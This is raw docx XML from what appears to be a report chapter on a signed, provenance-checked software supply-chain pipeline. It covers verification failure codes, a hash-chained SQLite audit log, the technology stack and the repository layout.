                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manifest signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ed25519 verification fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>INVALID_SIGNATURE</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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Recomputed digest differs from manifest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HASH_MISMATCH</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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Artifact signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Detached Ed25519 signature fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>INVALID_SIGNATURE</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Artifact / version status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Version revoked, below minimum, older than deployed, or same version with a different digest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>REVOKED / REPLAY_BLOCKED</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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Provenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Provenance hash mismatch, different artifact, unapproved builder or repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>INVALID_PROVENANCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="454"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Security policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Disallowed algorithm, vendor tests failed, exfiltration pattern found, manifest too old</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>POLICY_VIOLATION</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val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>On BLOCK the gate writes a structured security event (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SUPPLY_CHAIN_SECURITY_EVENT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, severity HIGH, with expected and actual digest, key ID and reasons), records VERIFY and DEPLOY=BLOCKED in the audit log, and does not copy the artifact into the deployment area. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>continuous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pipeline mode (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>run_pipeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) enforces the same rules at every stage: build, security tests, SHA-256, sign, provenance, publish, TLS download, verify, deploy. It stops at the first violation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.11 Audit Log and Database Schema</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CREATE TABLE audit_events (</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  timestamp TEXT NOT NULL, actor TEXT NOT NULL, action TEXT NOT NULL,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  artifact TEXT, version TEXT, sha256 TEXT, key_id TEXT,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  result TEXT NOT NULL,  -- PASS | BLOCKED | REVOKED | HASH_MISMATCH | INVALID_SIGNATURE | ...</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  reason TEXT, details TEXT,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  prev_hash  TEXT NOT NULL,        -- entry_hash of previous row (genesis = 64 zeros)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  entry_hash TEXT NOT NULL UNIQUE  -- SHA-256(prev_hash || canonical_json(row))</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Each row includes the hash of the previous row, forming a chain like a certificate-transparency log [16]. Editing, deleting or reordering any historical row breaks the chain, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>verify_chain()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> reports the first bad entry. Writers take an exclusive SQLite transaction, so the chain never forks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.12 Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Technology stack</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2041"/>
        <w:gridCol w:w="6917"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technology</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Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Python 3.11 (tested), compatible with 3.10+</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Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PyCA cryptography: Ed25519, X.509, ECDSA P-256, PKCS#8; hashlib SHA-256; hmac</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Transport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Python ssl (OpenSSL) with TLS 1.3 only; http.server / http.client</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Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQLite (audit log), JSON (manifest, trust policy, policy, state)</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CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Security gate CLI (exit codes) + GitHub Actions workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Testing / docs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>pytest, Graphviz, matplotlib, static HTML dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pP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6"/>
        </w:rPr>
        <w:t>secure-supply-chain/</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── vendor/            build.py, sign.py (signing service), key_manager.py, access_control.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── verifier/          verify.py, manifest.py, policy.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── distribution/      tls_registry.py      (TLS 1.3 registry + client)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── ci/                security_gate.py     (gate + continuous pipeline)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── audit/             audit_logger.py      (hash-chained SQLite log)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── attack_simulation/ tamper.py, revoked_key_test.py, run_all.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── dashboard/         generate_dashboard.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── common/            crypto_utils.py, security_rules.py, workspace.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── policy/            customer_security_policy.json</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── src_app/           secure-uploader.sh   (simulated uploader = protected artifact)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── tests/             test_supply_chain.py (25 tests), generate_test_report.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── docs/              DESIGN.md, diagrams/, results/</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>├── bootstrap.py       demo.py       README.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The core of the verification engine is shown below (abridged). All checks append to one result, and the first failure determines the status:</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6"/>
        </w:rPr>
        <w:t>trust = TrustPolicy.load(ws.trust_policy, ws.trusted_root, state["trust_policy_version_seen"])</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
